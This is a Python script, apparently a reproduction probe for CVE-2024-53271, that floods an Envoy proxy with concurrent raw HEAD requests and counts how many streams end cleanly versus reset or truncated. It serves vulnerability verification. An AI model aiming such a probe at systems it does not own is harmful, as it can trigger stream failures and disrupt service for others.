#!/usr/bin/env python3
"""
CVE-2024-53271 differential probe driver.

Drives concurrent HTTP/1.1 HEAD probes through an Envoy proxy and classifies
each probe as CLEAN (the downstream stream reached clean end-of-stream with a
final HTTP/1.1 response) vs FAILED (stream reset / connection error / no clean
end-of-stream). Prints a per-config clean-completion rate.

The exploit only DRIVES and CLASSIFIES the wire behavior; it does not decide
pass/fail. Usage:

    probe.py <label> <host> <port> <path> <count> <concurrency>

Classification (per request), done from raw socket bytes so we observe the
actual downstream HTTP/1.1 framing rather than a client library's smoothing:

  CLEAN  - upstream returned a well-formed final status line starting with
           "HTTP/1.1 " AND the response framing terminated cleanly (a complete
           header block ending in CRLFCRLF, with Content-Length: 0 / HEAD so no
           body is expected). i.e. clean end-of-stream.
  FAILED - connection error, empty/garbage response, no "HTTP/1.1 " status line
           (e.g. the corrupted "HTTP/0.9"-style / truncated stream the
           vulnerable BALSA parser emits when MessageDone() fires twice), or no
           clean header terminator -> abnormal termination.
"""
import socket
import sys
from concurrent.futures import ThreadPoolExecutor


def probe_once(host, port, path, timeout=5.0):
    """Return (clean: bool, detail: str) for one HEAD request."""
    req = (
        "HEAD {} HTTP/1.1\r\n"
        "Host: {}:{}\r\n"
        "User-Agent: cve-2024-53271-probe\r\n"
        "Accept: */*\r\n"
        "\r\n"
    ).format(path, host, port).encode()
    s = None
    try:
        s = socket.create_connection((host, port), timeout=timeout)
        s.settimeout(timeout)
        s.sendall(req)
        data = b""
        while b"\r\n\r\n" not in data and len(data) < 65536:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                return (False, "recv-timeout (no clean end-of-stream)")
            if not chunk:
                break
            data += chunk
        if not data:
            return (False, "empty-response (stream reset / decoder reset)")
        # First line must be a proper HTTP/1.1 status line.
        first_line = data.split(b"\r\n", 1)[0]
        if not first_line.startswith(b"HTTP/1.1 "):
            return (False, "bad-status-line: {!r}".format(first_line[:40]))
        # Header block must terminate cleanly (clean end-of-stream for HEAD).
        if b"\r\n\r\n" not in data:
            return (False, "no-header-terminator (truncated stream)")
        status = first_line.decode("latin-1", "replace")
        return (True, status)
    except (ConnectionResetError, BrokenPipeError) as e:
        return (False, "conn-reset: {}".format(e))
    except (socket.timeout, OSError) as e:
        return (False, "socket-error: {}".format(e))
    finally:
        if s is not None:
            try:
                s.close()
            except OSError:
                pass


def main():
    if len(sys.argv) != 7:
        sys.stderr.write(
            "usage: probe.py <label> <host> <port> <path> <count> <concurrency>\n"
        )
        sys.exit(2)
    label = sys.argv[1]
    host = sys.argv[2]
    port = int(sys.argv[3])
    path = sys.argv[4]
    count = int(sys.argv[5])
    concurrency = int(sys.argv[6])

    results = []
    with ThreadPoolExecutor(max_workers=concurrency) as pool:
        futs = [pool.submit(probe_once, host, port, path) for _ in range(count)]
        for f in futs:
            results.append(f.result())

    clean = sum(1 for ok, _ in results if ok)
    failed = count - clean
    rate = (clean / count * 100.0) if count else 0.0

    # Per-request classification (sample of failures for visibility).
    print("=== {} : {}:{}{}  ({} probes, concurrency {}) ===".format(
        label, host, port, path, count, concurrency))
    fail_samples = [d for ok, d in results if not ok]
    for d in fail_samples[:5]:
        print("  FAILED: {}".format(d))
    if len(fail_samples) > 5:
        print("  ... {} more failures".format(len(fail_samples) - 5))
    print("RESULT {}: clean={} failed={} total={} clean_rate={:.1f}%".format(
        label, clean, failed, count, rate))
    print()


if __name__ == "__main__":
    main()
